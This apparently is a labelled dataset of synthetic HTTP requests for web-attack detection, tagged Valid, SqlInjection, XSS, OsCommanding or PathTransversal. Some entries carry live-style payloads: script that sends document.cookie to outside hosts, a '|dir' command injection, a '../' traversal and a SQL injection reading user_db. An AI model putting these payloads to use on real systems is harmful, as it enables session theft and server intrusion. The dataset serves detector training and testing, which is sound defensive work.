GET /n_bW4JOLPZawJPeH/1fromc_dV30/b9_XLCCXGc/unsryqOdsfGrd/ttitYIyargi8nHsc/jnl/mVVB/n7veU3kctb/a-89fQkOarf4a_vCNt5c/o7F8t2_P/tteziedjhteanM4n/sgVPG-TVWvhUnIj.pl?rzh04pOmHqis=8&Elnex2oz6l=%3Cmeta++http-equiv++%3D++%22++refresh++%22+++++content+++%3D++%220%3Burl%3Djavascript%3A++++%5Bwindow.open%28%27http%3A%2F%2F8.56.136.8%2Fmeie.bin%27%2Bdocument.cookie%29%3B%5D+++++%22++%3E&svett9o=5570&rQAYZVgO2Ah=7&as=zOaDHYI&eaeitixL7onLaa=1027&lrbIb=h4hry HTTP/1.0
Host: 74.115.157.36
Connection: close
Accept: */*
Accept-Charset: iso-8859-5;q=0.5, x-mac-hebrew;q=0.8, shift_jis
Accept-Encoding: compress;q=0.3, gzip;q=0.8, identity;q=0.7, compress
Accept-Language: *;q=0.8
Cache-Control: min-fresh=8
Client-ip: 2.6.142.235
Cookie: fibc3iey=28952;KbL0o1dyyd=219;6WtDjegbI=18
Cookie2: $Version="22"
Date: Fri, 24 Mar 06 08:02:53 UTC
ETag: W/"SCzBCfLRWAMxc14"
Expect: 100-continue
From: clrwp@noorqoy.ch
If-Modified-Since: Mon, 05 Nov 07 02:03:08 UTC
If-Unmodified-Since: Thu, 15 Nov 07 03:43:33 UTC
If-Match: *
If-None-Match: "7m7aqRh_dlwv47lr"
If-Range: Sun, 04 Mar 07 13:21:36 GMT
Max-Forwards: 6891
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: NTLM c2lzZXVkcXNvT252d3NzNWlSbmVsc3NUcnZvZXVCNm90MnhlU250c1M1ZWVPZGV1
Authorization: Basic OHRvZGE6RTZ0dA==
Range: -43,-33,199214-
Referer: http://www.epzh.com/nsseode/dtaK1w.tiff
TE: chunked;q=0.6,deflate;q=0.6,chunked;q=0.4
Trailer: If-Range
User-Agent: 7dyeJcddghR1o
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 084x9415
Via: 1.8 246.164.138.81
Transfer-Encoding: oOtNne; ig9m=sooe
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 819 33.34.116.163 "Eun7wngOa" 
X-Forwarded-For: 208.27.214.144
X-Serial-Number: 8754080340538
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 47894
Start - Id: 7548
class: Valid
POST /btI/eYHEO/sZwUazo8ZuCjjK/rf2nu5v4NQ_1ESPlyT.cfm? HTTP/1.0
Content-Length: 213
Content-Language: esn,s
Content-Encoding: deflate
Content-Location: http://ue6Ermam.gov/ieasE/Kelrje/d1tahMdn/E5sopd/nfnW.zip
Content-MD5: dG5zM3RrZWNzUnIzbVVycg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 12 Aug 04 06:48:45 UTC
Last-Modified: Tue, 03 Oct 06 04:52:43 UTC
Host: www.he5Eyno.uk:80
Connection: nrnfo
Accept: audio/x-wav;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: identity, deflate;q=0.0, deflate;q=0.9, gzip
Accept-Language: *;q=0.6
Cache-Control: min-fresh=38
Client-ip: 145.137.168.172
Cookie: Saucc8grs3=527688;Re=orjn%;s8N=1361;SNttep=dxs@cNx7Ne;96=7856;itseeIefvwfenpe=srd
Cookie2: $Version="5"
Date: Wed, 10 Feb 10 02:22:04 GMT
ETag: W/"R.aisbSEVR_HgA0N"
Expect: fdsUq
From: nanSyva@xAweeehqTs.de
If-Modified-Since: Mon, 26 Jul 04 07:34:36 CET
If-Unmodified-Since: Sun, 25 Nov 07 17:19:18 UTC
If-Match: "oZXk7vg5OefTZLeCv"
If-None-Match: *
If-Range: "4WIauTSqb1ryBhDJn4"
Max-Forwards: 9669
MIME-Version: 1.7
Pragma: teBW=ro
Proxy-Authorization: NTLM d2llb2V3b3ZodXNkb3RkVGFFaGJoMHFsbnVxbG1hbXQyc2V6b2hoYQ==
Authorization: Basic YmVpMXA6RWdydGhpYQ==
Range: 31105-
Referer: http://aRuhtot.fr/cotis/rt9tenic/escdoe.zip
TE: chunked
Trailer: Via
User-Agent: uibd8ayS
UA-CPU: x86
UA-Disp: 845,5230,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8581x949
Via: 7.7 www.tHen.tiff, HTTP/1.2 28.86.73.93, scaet4/3.5 www.n8olNet.html:586
Transfer-Encoding: xma8
Upgrade: Tbwl/8.0, e3IaS/2.0
Warning: 217 www.9ie160j.gif "puqyTO1Ctongfiam9t" "Sat, 03 Feb 07 15:31:48 CET"
X-Forwarded-For: 191.61.229.46
X-Serial-Number: 49024
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dhnvskUlc=0740010&4M4aDu=044808&tedyl=1362&nisrbsa=949306&e6iruuEya3s=kFJjKmFw&eeht=71&Itl8sSka4=ijCTDTt&se29=414&edcl=h2lrebnm li+ph&3euoo2uhwys=88692010&Osanlv=x6JnggN8r3ao&fctpsehu=87lhiswy&otxDdepsASmks=ooOs

End - Id: 7548
Start - Id: 35990
class: PathTransversal
PUT /tA1esipviarezns/yBmeGwJzkWHk4l/e7ohqh3yn7qf/n8BGpoLMA/sRE8Fjw83zV./aJmnpdWskxRsqRjC/rtc.Y5BV/mrat5wmiit/eWGuBX1AHxcm8.asp? HTTP/1.0
Content-Length: 297
Content-Language: 6urpclu,eskoyr,tptn
Content-Encoding: compress
Content-Location: /rvit8hh/tlnt.png
Content-MD5: bDYyZXMycmNhZm55aHBlMg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 26 Aug 04 12:48:27 CET
Last-Modified: Sun, 19 Aug 07 13:02:45 GMT
Host: www.Amhhrl0pe.gov:80
Connection: tstto8y
Accept: application/zip;q=0.3, video/*, audio/basic;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 221.251.39.195
Cookie: eatlpa3teDu=390;2ets3=lzpof;pecgge=d'3tt;2qPAxKhCMi=07;TGnjcvoe=phaving;erizuseemAonATt=99
Cookie2: $Version="87"
Date: Wed, 21 Nov 07 10:38:55 UTC
ETag: W/"Ek3BXcozS.u2Oc09Vcd"
Expect: 100-continue
From: hacs@cltuesA.com
If-Modified-Since: Mon, 13 Dec 04 10:30:50 GMT
If-Unmodified-Since: Wed, 13 Sep 06 15:25:08 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 27 Jul 04 24:14:13 CET
Max-Forwards: 655
MIME-Version: 5.1
Pragma: ourn='et7eh'
Proxy-Authorization: Basic bmlscm5ndDpkMjh1YWE5
Authorization: Digest opaque="zhbe"
Range: 799-,4-,-692713
Referer: http://5ttr.uk/nbuhTnee/hdwpdAh.sh
TE: chunked,trailers,chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/5.7 (compatible; MSIE 9.1; Unix; 1oodc1; r4sKSuff)
Via: HTTP/6.1 59.149.130.67, 7.8 181.30.123.181, 5aodr/6.6 124.179.236.156:9
Transfer-Encoding: gzip
Upgrade: uUi/7.8, eeds/2.6, Myede/4.4
Warning: 420 www.esiroa.js "tdoieaa" "Wed, 03 Jan 07 09:34:59 GMT"
X-Forwarded-For: 133.228.168.254
~~~~~: ~~~~~~~~~~~~~~~~~~~~

fnaceDsi=mdcdnhdiu&ehr=b-9IeIUDgF&ee2ot=/../../../Inetpub/iissamples/icilis/alil/olch/singelonet.sh&EttGrufcrtpa=lqo&oTuy=passwdx+al%p(ns5t':istdind+&rewb35lr=i&n-prXYpujDNt=diaTdeleteem$5&nofsi2g=Ihtmps 2aIit|z-t~eser&KWZm6svsystemD3z=n7ent&tfnote2=nv4XiNV-qWW

End - Id: 35990
Start - Id: 42824
class: OsCommanding
POST /renmihsrammE/tV5Qt/i3g/ie2/ty5mg90IJbzZvX/dla/sDj8U1dASu/rT3JRyr.htm? HTTP/1.1
Content-Length: 205
Content-Language: ewbuoha
Content-Encoding: gzip
Content-Location: /hhEE.exe
Content-MD5: bm9hOWhhZHRhbWRzVWhpcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 27 Nov 06 15:04:31 GMT
Last-Modified: Mon, 07 Sep 09 14:32:22 GMT
Host: 177.24.43.229
Connection: keep-alive
Accept: video/mpeg, text/html, text/plain;q=0.0
Accept-Charset: *
Accept-Encoding: deflate;q=0.6, identity;q=0.8
Accept-Language: et4srag-eL, wrct-laiit;q=0.6, btt8ya-z;q=0.1, Odpmvce-etm
Cache-Control: min-fresh=1603
Client-ip: 114.218.58.189
Cookie: ty=include;6ckolKxdmsYicdx=42413942;ar2irh=5335;ueqz=155419
Cookie2: $Version="14"
Date: Sun, 01 Feb 04 14:17:02 GMT
ETag: "5ZPilOmFYaosnwTxq"
If-Modified-Since: Thu, 21 Dec 06 13:05:06 GMT
If-Unmodified-Since: Thu, 01 Jan 09 05:59:15 CET
If-Match: *
If-None-Match: "VLiBVias5879K8lQ"
If-Range: "fI27yYT-yHZcUy4lyd"
Max-Forwards: 2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest uri=http://www.mandee.de/tnwt.php
Referer: http://www.eotpe.com/iueel/lieieTbr.doc
TE: trailers,trailers
Trailer: Range
User-Agent: eeezgA7Oii/1.2.4.4
UA-CPU: StrongARM
UA-Disp: 147,2308,32
UA-Pixels: 0367x479
Via: m2ht/6.2 166.13.184.56:2, HTTP/8.9 170.6.70.105
Transfer-Encoding: deflate
X-Forwarded-For: 95.96.130.184
X-Serial-Number: 328285479278468
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

an1haneaeoao=11863&gjrlxho9bea=259689&saddcn=n&ohMnrhctuiaiesi=90&iqNi7eReseeN=64.20.147.24   |dir&i9jihsui=eh&rhcpsRN2=143264&aebo=26&rr5Oeyyeio6rL=32598650&htNclnideFyn=69&uaRdbordai4=rej&eho0fgtyi=1o-

End - Id: 42824
Start - Id: 27296
class: Valid
GET /r0yr71ny7gk/trdzlnqa/snata4vlImsHe/ernBn1ea2RsHtpmme/TB_a/ZcRwre2togmiiO.jpeg?n3ieaa8hauI48so=%27iioi0rfoysee&esflie=a86R8Dh-8h&aearhpbH7r=lbDf&a8hM=fQqC&khyle42n4wTjIat=uSostgzri8dOeer&mto8uehu=oo&fuujttejtzt=yXcBqcdoRWR7 HTTP/1.0
Host: www.drTr2a.be
Connection: close
Accept: */*;q=0.7
Accept-Charset: utf-7;q=0.8, big5, windows-1250;q=0.4
Accept-Encoding: identity, deflate;q=0.1
Accept-Language: *
Cache-Control: min-fresh=44
Client-ip: 191.18.69.14
Cookie: 9wzanzCb=0693369;oorHu4Sr=3;taaesynooVso=?Llsfp;ncl9Too=ya;5tj6eaka=mi+
Cookie2: $Version="63"
Date: Sun, 19 Mar 06 17:08:16 CET
ETag: W/"dZdeLIIail_Zlt0UZ"
Expect: 100-continue
From: lmrot@msheNjsgm.cz
If-Modified-Since: Fri, 21 May 04 12:13:08 UTC
If-Unmodified-Since: Wed, 21 May 08 24:09:13 CET
If-Match: "zdv.cLHsyxs-6@LqDf"
If-None-Match: "B6IGT04sxI6fCRoC1-P."
If-Range: Fri, 31 Aug 07 01:07:26 GMT
Max-Forwards: 0
MIME-Version: 8.0
Pragma: ee=hjryh
Proxy-Authorization: NTLM cGxzckZBc2JjYXVDYTljMXNldXJhaXU1cnl0aGluYmVzY1J0ZHNwc24=
Authorization: Digest cnonce="yrmhni"
Range: 029274-0591,35212-27,5866-
Referer: /tugyE2r.txt
TE: trailers,gzip;q=0.3,deflate
Trailer: Via
User-Agent: Mozilla/4.1 (compatible; Konqueror/0.6; Mac OS X; utbetAnie)
UA-CPU: 68000
UA-Disp: 3109,349,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6912x6352
Via: 2.0 224.232.11.39
Transfer-Encoding: gzip
Upgrade: pos/2.6
Warning: 650 139.231.175.172 "eiohyeeedPe" 
X-Forwarded-For: 202.99.49.239
X-Serial-Number: 75164077038098175
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 27296
Start - Id: 29524
class: Valid
GET /eag/ifXbNNoAjHCYFEU/rfocIrtEmarsit/h3ai2hN6rn/n442mp4ZZB5hfB5UD/hBCu3EtmJ/A3pwVbgsoundFIYRVs/dVZPCK/icInvZnXiwYVah/r1t/_eQdaccess_logSx4Ve/oSm3.html? HTTP/1.0
Host: 73.198.174.106:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: cp-936;q=0.2, iso-8859-8;q=0.3, windows-1250;q=0.2, iso-8859-7;q=0.0, windows-1257;q=0.7
Accept-Encoding: deflate;q=0.8, identity;q=0.0, compress
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 56.253.189.85
Cookie: srrobuee=nkhvpwlayI
Cookie2: $Version="08"
Date: Sun, 12 Nov 06 14:07:00 UTC
ETag: "Tg-hMaywFOEgOvXf"
Expect: 100-continue
From: 1ez9dnn@bsgxsssn.gov
If-Modified-Since: Fri, 05 Oct 07 05:39:37 GMT
If-Unmodified-Since: Thu, 06 Aug 09 13:00:39 GMT
If-Match: *
If-None-Match: *
If-Range: "Tkgf3XM46Sp-Mp2Kbuv"
Max-Forwards: 9488
MIME-Version: 6.1
Pragma: t0s=la2b
Proxy-Authorization: Basic M2djZXFtOngzaW4=
Authorization: Basic ZG1yaWw6MmFIRWl0SQ==
Range: 39-
Referer: http://www.KsmaI.de/50a7te/ounxa/wvbseH/Symhmea.wav
TE: chunked;q=0.8,trailers
Trailer: From
User-Agent: dsioF/5.4.8.5
UA-CPU: x86
UA-Disp: 4302,407,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3909x9569
Via: 6.1 11.211.122.216
Transfer-Encoding: compress
Upgrade: btsTai/0.7, ltOC/6.6, 3ee/0.5, av5o/8.4
Warning: 165 40.104.150.168:5 "edi68onCrxTzagentdr" 
X-Forwarded-For: 41.168.99.7
X-Serial-Number: 734922688511109
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29524
Start - Id: 11659
class: Valid
GET /3thmheeEe/aAePxWL.N/doKHXLz2T.msf?4awsee7ap=tay%3Biclhnd&hoeoo0rh=widE&lzT_lY4S=anbepFp5dreoh+i&ztlursySut7=tocimNtsteOc%3E&eteeafoKd0=057685&tvpttfrasesotd=5157315723&HjNB0M75LS=%3D%24o&at=7032693 HTTP/1.1
Host: www.teLVere.uk
Connection: close
Accept: */*
Accept-Charset: iso-8859-6;q=0.9, iso-8859-3, cp-932
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 38.112.56.235
Cookie: rtRer=2;manwho5b=sobrfdisg;raws=89941726;l1dI=65;cmlehtess=< ;sq=y5eenx460dorh
Cookie2: $Version="94"
Date: Sun, 19 Oct 08 22:10:32 GMT
ETag: "sqYjr0uylAea_g5"
Expect: eThAaoa
From: yspI@eunniwes.st
If-Modified-Since: Sun, 18 Jan 09 14:33:22 UTC
If-Unmodified-Since: Sun, 19 Sep 04 19:57:42 GMT
If-Match: "AzWFxez1kpv7E_@"
If-None-Match: *
If-Range: Mon, 16 Jun 08 24:11:50 GMT
Max-Forwards: 9
MIME-Version: 2.8
Pragma: e='eeu'
Proxy-Authorization: Basic dXRybmsyOm5ldGljdA==
Authorization: Basic SDhsZWh0enQ6VFJqd3NtZQ==
Range: 5-70688,-030
Referer: /TDede/vOektTte.asmx
TE: chunked;q=0.0,deflate;q=0.6,trailers
Trailer: Via
User-Agent: Adleazt (e7X60X; fLsKBE_; iuY@69eBhO; hm7Q0w)
UA-CPU: PowerPC
UA-Disp: 3478,401,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 178x213
Via: FTP/5.7 140.143.127.141, HTTP/2.4 www.otyedi.jpeg, 9.3 www.edybra.shtml
Transfer-Encoding: gzip
Upgrade: trhtt/1.3
Warning: 062 147.28.128.111 "yeya0Tla6en" 
X-Forwarded-For: 106.177.217.179
X-Serial-Number: 7331702860784
----: -------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 11659
Start - Id: 32635
class: Valid
POST /IFselecttPRC6-scriptVgroup byvT/sAhSfAoz_mQVR6Cb4/qOLT2Z/rl4bl/mKn2EWzPg/116/cHaioeTdc7n.gif? HTTP/1.0
Content-Length: 46
Content-Language: ddEyR
Content-Encoding: gzip
Content-Location: http://www.udofsttr.cz/qasQxm5/ostaess/eTga.mpeg
Content-MD5: ZXR0bGppdDB3dWpld2lZMw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Sep 09 04:12:26 UTC
Last-Modified: Sun, 15 Jan 06 16:40:30 CET
Host: www.tEs1Sence.com:1785
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 139.120.203.64
Cookie: rlacropTns=e ne;AZotmp9isI6u=oIztl<ui |r%e(%te
Cookie2: $Version="643"
Date: Sat, 09 Feb 08 13:28:28 CET
ETag: "mIeVAW7NphVBy_S"
Expect: htOEAnxm
From: thueneui@iqeto5ti.org
If-Modified-Since: Sun, 13 May 07 22:01:36 UTC
If-Unmodified-Since: Sat, 27 Aug 05 15:57:04 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5941
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Basic dG5zcDB3OnJ0amlr
Authorization: Basic Z25naGM6ZXcxZXR0Mg==
Range: -8365,-00217
Referer: http://tdu0.net/hraahjis/ewea/guls/enxr0S.php4
TE: trailers,gzip;q=0.9,deflate
Trailer: Cache-Control
User-Agent: Mozilla/4.1 (X11; U; Linux i586 0.6; ey-nt; rv:5.9.9) Gecko/61534030
UA-CPU: PowerPC
UA-Disp: 530,9577,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 853x924
Via: 4.2 228.147.251.150, 5.7 www.cJaosg.gif, FTP/2.6 www.1eb8h.jpeg
Transfer-Encoding: compress
Upgrade: ynt1h/8.2, ngs7ii/4.5, emia/0.6, hboy/6.2
Warning: 960 www.0iBqm.htm "egimmrwtfsoosti" 
X-Forwarded-For: 118.148.230.191
X-Serial-Number: 4855309378866511170
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

hrrteb5rrtzo=&ma&i94=87966&nttaEo=rkLqjjWI_e

End - Id: 32635
Start - Id: 29695
class: Valid
GET /oYE9yTV9E07g2py.msf?1OWe=aT+we&usbodynAfvbYhdeleten=ncnea&rngrzriioeoiw=5847729 HTTP/1.0
Host: 127.101.100.60
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.3, gzip, identity
Accept-Language: *;q=0.5
Cache-Control: min-fresh=01
Client-ip: 210.96.241.160
Cookie: WQOLOCw.NSq=7682433;6wlMXaccept.=61604090;Rlsdx=tan;ssln2Ahxla=0;Of@Mcprocessing-instructionr5C=nnie6oorcwona;oRnhlm2d=iohdrttoAn
Cookie2: $Version="29"
Date: Wed, 03 Mar 04 10:29:21 UTC
ETag: "vgw5H5d@jmsrgswau"
Expect: abde=1iwox;R5dg
From: icqca@mi5a7iM.cz
If-Modified-Since: Fri, 14 Aug 09 24:46:59 CET
If-Unmodified-Since: Wed, 04 Jun 08 17:06:20 UTC
If-Match: *
If-None-Match: *
If-Range: "hCcu4TU66QDLGMLoIRsj"
Max-Forwards: 0
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Basic d2NpZnRyeTpvdFVnZWxocw==
Authorization: tiits crrrIW=ts6aec
Range: -551432,8-
Referer: http://www.r1g3dag1.gov/Oott/sOtteae/deei5/ottawso/uimebrQ.asp
TE: trailers,trailers
Trailer: Accept
User-Agent: etoec (m-F5skNjtN; 3wiJpSQ7; 4-o.7n8L)
UA-CPU: MIPS
UA-Disp: 0427,819,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7452x2793
Via: 5.2 116.216.29.154, bdtdhy/7.4 168.170.152.118
Transfer-Encoding: cesTfa; tc31=eutoeP
Upgrade: vdqdss/4.7, wsibnl/9.2
Warning: 815 14.166.82.144 "nHdnNhh4go8" 
X-Forwarded-For: 25.252.143.178
X-Serial-Number: 149051815209
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29695
Start - Id: 42323
class: SqlInjection
GET /1HYUSAK/ouHRpeVeh8SiYE6-TJm/eTf0t12elrhfayit.htm?ZJ8body=to&tgaii5=object&IaShnmeid2a=8560530&ht6iMan=edropt%2FahJa&eIfl=%27++++or++id++in++++%28+select++*++++from+++++user_db++++%29&muut1feiabfropi=m&eTa=ois&rH4iotnnonwoo=u%5De&kter6ehafyaeecn=887&ndtotpihmygbsCe=tecoll3te&aotzne=o7%28a&o2eckkci4inq=2025&auamf=721854744&aDtwsitweitp6Ta=ueEpsneiNeNtg HTTP/1.0
Host: www.oGy4r69.st
Connection: essCa
Accept: application/*
Accept-Charset: iso-8859-3;q=0.2, us-ascii
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 64.206.153.107
Cookie: 8eoaon=oNNvLS
Cookie2: $Version="97"
Date: Fri, 29 Feb 08 01:31:37 UTC
ETag: "Ksz6YAgeD1hO7Ki"
Expect: rlstreu=Tpet8sAn
From: vtsibh@nsti.biz
If-Modified-Since: Sun, 28 Oct 07 03:27:22 CET
If-Unmodified-Since: Fri, 28 Nov 08 01:06:39 UTC
If-Match: "RYZ6ybnh5s_U.@o_Fx4"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 1.5
Pragma: noo=gfqeAmf
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Digest cnonce="sli9ah"
Range: -8
Referer: http://www.6iahli.be/8s0ots/tsye/7dyedue/isb7F.msf
TE: chunked;q=0.6
Trailer: If-Match
User-Agent: nsjs (eXuu81; uxEg38UWNd; d8Rd3u7; wtYEQj5_sm)
UA-CPU: MIPS
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4371x6437
Via: 3.0 www.rhobangN.png, 2.3 239.43.172.45:484
Transfer-Encoding: identity
Upgrade: roeoon/1.6, etEa/9.2
Warning: 797 57.31.42.175 "ddh8os78iba" "Mon, 22 Aug 05 11:07:24 UTC"
X-Forwarded-For: 47.158.122.16
X-Serial-Number: 807714416153290560
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42323
Start - Id: 24269
class: Valid
GET /v6PKG6uZ-stlfZn.TDC/aqnthhTsnb/3rrhamfnmpsfuhfiT/rgO/gNJQ@BmJ6sqjZTA/SOewsofqtssev/us/rlrdkenftalrllNrHhyO/pRG8D7q@6SlbAXG/o2b@3l.nZ4zSCvh/nWzb4QY9EE.aspx?tb=9&m4mReyo5=lkpkm&iiaLdgi=903&hp6t3eogi0tiheh=ort0aGf0-&eztSh=ornlbitno&oSekaote=e%7Eordtjexecdc&1l@yPUzzt=650683&peOGolsolme6s=93633&kJnvseulm=lr+ih&g3ino=x%27+ilfob%26cglpositionfam&idxrEPtilad=3650373 HTTP/1.1
Host: www.hireoem.ch
Connection: keep-alive
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.9, cp-936;q=0.7
Accept-Encoding: *;q=0.7
Accept-Language: tmlla-nvllmxe, an2diag-thceeUeh;q=0.8, d-a, ao3nthhh-m;q=0.5
Cache-Control: no-store
Client-ip: 91.45.38.120
Cookie: NpEau=diva7imt;tositosadiyso=848;litdge=1972740;kx8dtedseH=20658151;jmdvsykt=tesKeaeDial2
Cookie2: $Version="205"
Date: Sun, 28 Mar 04 20:04:27 UTC
ETag: "NMhjg9f.qPt2qDmCsgH"
Expect: oeht=l9TsdoR;totD
From: somsctd@slielEozga.ch
If-Modified-Since: Fri, 12 Jun 09 10:46:15 GMT
If-Unmodified-Since: Sun, 10 Jun 07 03:37:27 GMT
If-Match: "cEW7kFxmNXQgTaITI"
If-None-Match: "JY67smCLtMJXbe2"
If-Range: "yW01WTZgr6-MCZY"
Max-Forwards: 4
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Basic Y2k3cGU5bjphbnNlYQ==
Authorization: NTLM bW90Y2Zzc28xc2h3aXN6YWVleXRzaGJvbWR0YXJlaWVtdGltYWk2bjJzNGw5aA==
Range: 6702-
Referer: /ortnionn/n1sIs/1zJn.exe
TE: deflate;q=0.1
Trailer: Trailer
User-Agent: uEnis (hQoP4Tw; rqIEFpPw; eN-j0R)
UA-CPU: PowerPC
UA-Disp: 097,7605,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 982x566
Via: 8.3 51.130.121.183, 7.6 www.tlore.shtml
Transfer-Encoding: identity
Upgrade: nmsBw/3.6
Warning: 698 155.250.223.172 "sso2" 
X-Forwarded-For: 197.180.62.9
X-Serial-Number: 2123375255700978205
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24269
Start - Id: 46925
class: XSS
PUT /ihkbEyq-gW/edr/Kb3m/iDd/OsbQxs/tRw4YDUmHUeslJ_@dQ/ttewvena/rieD/eSos1Wp2Nl/eUiJXJ20ggBrG.htm? HTTP/1.1
Content-Length: 317
Content-Language: tkhn,pn
Content-Encoding: compress
Content-Location: /aeuttth.bin
Content-MD5: OG5BdDNpcnNhYXJvZWh0dQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 26 Jan 08 22:56:04 GMT
Last-Modified: Thu, 09 Mar 06 03:45:20 CET
Host: www.dkeao.it
Connection: Brok
Accept: image/png, text/*, image/jpeg;q=0.6
Accept-Charset: iso-8859-2;q=0.1, windows-1254, windows-874, windows-1251, x-mac-korean;q=0.9
Accept-Encoding: 
Accept-Language: rdEMett-vdaaFaM, trfll-njv1, ghtuwne-hia;q=0.1
Cache-Control: no-store
Client-ip: 53.2.228.212
Cookie: emeStTeOat=t6
Cookie2: $Version="0"
Date: Fri, 16 Jun 06 08:05:13 UTC
ETag: W/"_uuPg0cLnphDTjTe"
Expect: 100-continue
From: HsznrM@xmaxp.fr
If-Modified-Since: Tue, 06 Nov 07 18:09:18 UTC
If-Unmodified-Since: Fri, 02 May 08 19:41:55 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 27 Mar 10 20:14:57 CET
Max-Forwards: 934
MIME-Version: 9.1
Pragma: h3kpu='EAise'
Proxy-Authorization: Basic Ym9lZGVuOjl1OGpJbg==
Authorization: Basic ZG1lY21jOm5pbHE=
Range: -790
Referer: /gdeser/zMqRTekg/m8eGwjne/umhsba/liziwa.js
TE: chunked,deflate,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/6.0 (X11; U; Open BSD i386 4.9; sl-ne; rv:6.1.0) Gecko/49455699
UA-CPU: MIPS
UA-Disp: 4346,951,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 537x7894
Via: 5.6 30.229.92.116:976, uhptG/9.5 245.142.8.51, awe3e/8.4 49.110.174.190:5745
Transfer-Encoding: letij
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 179 www.uasae.gif "peEehwtea6n8inr" 
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 3374825125599046
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

srl=593047&9tbcedSaVxhi2l=<body onload    ="  [document.location.replace    ('http://www.netoon.com/cgi-bin/arritimeas.cgi'+document.cookie);] ">&isrnhesEsed0sE=anfluuU~nf%2myE&eFjeH=uT6yOhAGo&at9atdRiao=n ton nnmetardeo&owaRLfeua=olin &IFVfa==nbe<h&exechttpJ5gadminl=n\4

End - Id: 46925
Start - Id: 19204
class: Valid
GET /TnsrgwevUbut/bSujoCKD8@_nJd0TM/vSo2dzsz/pORy1e.3fT.html?88.73T-incIIq=dy+d%5B&0eiddtiBt=nopenhr&2Eeue2rwesNa8i=2137279192&wagopavfsfMeasd=to%26jbtfnshN+seA7cte%3C&nrmj8e=m HTTP/1.0
Host: www.a3dh.uk
Connection: 4hqes
Accept: text/*;q=0.6, audio/x-wav, text/*;q=0.4
Accept-Charset: cp-950, windows-1252;q=0.0, cp-950;q=0.3
Accept-Encoding: gzip, gzip;q=0.9
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 168.224.75.14
Cookie: eoek=733541;aEcF=b+t delete;croace0=05
Cookie2: $Version="3"
Date: Mon, 28 Feb 05 01:13:48 GMT
ETag: W/"nqeS2aEaHXxMLY2Se"
Expect: 100-continue
From: nendeo@nesuf.ch
If-Modified-Since: Mon, 05 Jul 04 22:36:34 UTC
If-Unmodified-Since: Fri, 07 Aug 09 01:44:07 UTC
If-Match: "_0kCm02wi0ien2eO@"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 8.3
Pragma: Zn='ffhr'
Proxy-Authorization: NTLM QW9mM3l1YXZ0aXI3MHNsd3N1cmVkbnVTbnJoRGV3bHlkdWVlbmw=
Authorization: Digest username="rndaa"
Range: 967604-010774,-548402
Referer: http://www.efhcg.cz/8rehe/oi1id.zip
TE: trailers,chunked;q=0.9,chunked
Trailer: Authorization
User-Agent: lrzr0rm/2.1.5.5.3
UA-CPU: 68000
UA-Disp: 246,582,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 203x411
Via: slh/8.5 23.59.41.249
Transfer-Encoding: deflate
Upgrade: deldgt/6.6
